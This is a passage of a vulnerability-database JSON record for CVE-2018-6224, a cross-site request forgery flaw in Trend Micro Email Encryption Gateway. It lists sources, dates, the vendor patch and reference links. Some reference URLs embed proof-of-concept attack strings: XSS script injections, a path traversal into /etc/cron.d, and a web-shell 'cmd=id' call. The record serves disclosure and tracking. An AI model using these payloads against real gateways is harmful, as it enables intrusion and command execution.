or info@coresecurity.com\n\n12. *Disclaimer*\n\nThe contents of this advisory are copyright (c) 2018 Core Security and\n(c) 2018 CoreLabs,and are licensed under a Creative Commons Attribution\nNon-Commercial Share-Alike 3.0 (United States) License:\nhttp://creativecommons.org/licenses/by-nc-sa/3.0/us/\n\n13. *PGP/GPG Keys*\n\nThis advisory has been signed with the GPG key of Core Security advisories\nteam, which is available for download at\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc", "sources": [ { "db": "NVD", "id": "CVE-2018-6224" }, { "db": "JVNDB", "id": "JVNDB-2018-002793" }, { "db": "BID", "id": "103435" }, { "db": "VULHUB", "id": "VHN-136256" }, { "db": "VULMON", "id": "CVE-2018-6224" }, { "db": "PACKETSTORM", "id": "146508" } ], "trust": 2.16 }, "exploit_availability": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "reference": "https://www.scap.org.cn/vuln/vhn-136256", "trust": 0.1, "type": "unknown" }, { "reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=44166", "trust": 0.1, "type": "exploit" } ], "sources": [ { "db": "VULHUB", "id": "VHN-136256" }, { "db": "VULMON", "id": "CVE-2018-6224" } ] }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2018-6224", "trust": 3.0 }, { "db": "EXPLOIT-DB", "id": "44166", "trust": 1.2 }, { "db": "JVNDB", "id": "JVNDB-2018-002793", "trust": 0.8 }, { "db": "CNNVD", "id": "CNNVD-201802-661", "trust": 0.7 }, { "db": "PACKETSTORM", "id": "146508", "trust": 0.7 }, { "db": "NSFOCUS", "id": "39164", "trust": 0.6 }, { "db": "BID", "id": "103435", "trust": 0.4 }, { "db": "VULHUB", "id": "VHN-136256", "trust": 0.1 }, { "db": "VULMON", "id": "CVE-2018-6224", "trust": 0.1 } ], "sources": [ { "db": "VULHUB", "id": "VHN-136256" }, { "db": "VULMON", "id": "CVE-2018-6224" }, { "db": "BID", "id": "103435" }, { "db": "JVNDB", "id": "JVNDB-2018-002793" }, { "db": "PACKETSTORM", "id": "146508" }, { "db": "NVD", "id": "CVE-2018-6224" }, { "db": "CNNVD", "id": "CNNVD-201802-661" } ] }, "id": "VAR-201803-1789", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VULHUB", "id": "VHN-136256" } ], "trust": 0.01 }, "last_update_date": "2023-12-18T12:02:26.967000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "1119349", "trust": 0.8, "url": "https://success.trendmicro.com/solution/1119349" } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2018-002793" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-352", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-136256" }, { "db": "JVNDB", "id": "JVNDB-2018-002793" }, { "db": "NVD", "id": "CVE-2018-6224" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.2, "url": "https://www.coresecurity.com/advisories/trend-micro-email-encryption-gateway-multiple-vulnerabilities" }, { "trust": 1.5, "url": "https://success.trendmicro.com/solution/1119349" }, { "trust": 1.3, "url": "https://www.exploit-db.com/exploits/44166/" }, { "trust": 0.9, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-6224" }, { "trust": 0.8, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-6224" }, { "trust": 0.7, "url": "https://success.trendmicro.com/solution/1119349-security-bulletin-trend-micro-email-encryption-gateway-5-5-multiple-vulnerabilities" }, { "trust": 0.6, "url": "https://packetstormsecurity.com/files/146508/trend-micro-email-encryption-gateway-xss-code-execution.html" }, { "trust": 0.6, "url": "http://www.nsfocus.net/vulndb/39164" }, { "trust": 0.3, "url": "http://www.trend.com" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/352.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "http://corelabs.coresecurity.com/" }, { "trust": 0.1, "url": "https://[server]/logconfiguration.do" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-6220" }, { "trust": 0.1, "url": "https://[server]/keymanserverconfig.jsp?keyage=3\u0026keyageunits=m\u0026deniedkeysexpiretimeout=6000yta9q%22%3e%3cscript%3ealert(1)%3c%2fscript%3ekb4w2xa9v0d\u0026keymanserveraction=kmsconfig%3apostback" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-6225" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-6227" }, { "trust": 0.1, "url": "https://[server]/mimebuilderconfig.jsp?zdmaintemplatezdv4=%22%3e%3cscript%3ealert(1)%3c/script%3e" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-6223" }, { "trust": 0.1, "url": "http://downloads.privatepost.com/files/tmeeg/updates/../../../../../../../etc/cron.d/test" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-6219" }, { "trust": 0.1, "url": "http://creativecommons.org/licenses/by-nc-sa/3.0/us/" }, { "trust": 0.1, "url": "http://downloads.privatepost.com/files/tmeeg/updates/data.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-6226" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-6222" }, { "trust": 0.1, "url": "http://www.coresecurity.com/files/attachments/core_security_advisories.asc." }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-6230" }, { "trust": 0.1, "url": "https://[server]/pepito.jsp?cmd=id" }, { "trust": 0.1, "url": "https://server/policies.jsp" }, { "trust": 0.1, "url": "https://[server]/policies.jsp" }, { "trust": 0.1, "url": "http://corelabs.coresecurity.com." }, { "trust": 0.1, "url": "http://apac.trendmicro.com/apac/enterprise/network-web-messaging-security/email-encryption/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-6221" }, { "trust": 0.1, "url": "http://downloads.privatepost.com/files/tmeeg/updates/[installation" }, { "trust": 0.1, "url": "https://[server]/checkforupdates.do\"\u003e" }, { "trust": 0.1, "url": "https://[server]/mimebuilderconfig.do" }, { "trust": 0.1, "url": "https://server/editpolicy.jsp" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-6228" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-6229" } ], "sources": [ { "db": "VULHUB", "id": "VHN-136256" }, { "db": "VULMON", "id": "CVE-2018-6224" }, { "db": "BID", "id": "103435" }, { "db": "JVNDB", "id": "JVNDB-2018-002793" }, { "db": "PACKETSTORM", "id": "146508" }, { "db": "NVD", "id": "CVE-2018-6224" }, { "db": "CNNVD", "id": "CNNVD-201802-661" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULHUB", "id": "VHN-136256" }, { "db": "VULMON", "id": "CVE-2018-6224" }, { "db": "BID", "id": "103435" }, { "db": "JVNDB", "id": "JVNDB-2018-002793" }, { "db": "PACKETSTORM", "id": "146508" }, { "db": "NVD", "id": "CVE-2018-6224" }, { "db": "CNNVD", "id": "CNNVD-201802-661" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2018-03-15T00:00:00", "db": "VULHUB", "id": "VHN-136256" }, { "date": "2018-03-15T00:00:00", "db": "VULMON", "id": "CVE-2018-6224" }, { "date": "2018-02-21T00:00:00", "db": "BID", "id": "103435" }, { "date": "2018-05-01T00:00:00", "db": "JVNDB", "id": "JVNDB-2018-002793" }, { "date": "2018-02-21T22:22:22", "db": "PACKETSTORM", "id": "146508" }, { "date": "2018-03-15T19:29:00.860000", "db": "NVD", "id": "CVE-2018-6224" }, { "date": "2018-02-21T00:00:00", "db": "CNNVD", "id": "CNNVD-201802-661" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2018-04-04T00:00:00", "db": "VULHUB", "id": "VHN-136256" }, { "date": "2018-04-04T00:00:00", "db": "VULMON", "id": "CVE-2018-6224" }, { "date": "2018-02-21T00:00:00", "db": "BID", "id": "103435" }, { "date": "2018-05-01T00:00:00", "db": "JVNDB", "id": "JVNDB-2018-002793" }, { "date": "2018-04-04T14:19:04.060000", "db": "NVD", "id": "CVE-2018-6224" }, { "date": "2018-02-28T00:00:00", "db": "CNNVD", "id": "CNNVD-201802-661" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201802-661" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Trend Micro Email Encryption Gateway Vulnerable to cross-site request forgery", "sources": [ { "db": "JVNDB", "id": "JVNDB-2018-002793" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "cross-site request forgery", "sources": [ { "db": "CNNVD", "id": "CNNVD-201802-661" } ], "trust": 0.6 } }
Sightings
Author | Source | Type | Date |
---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.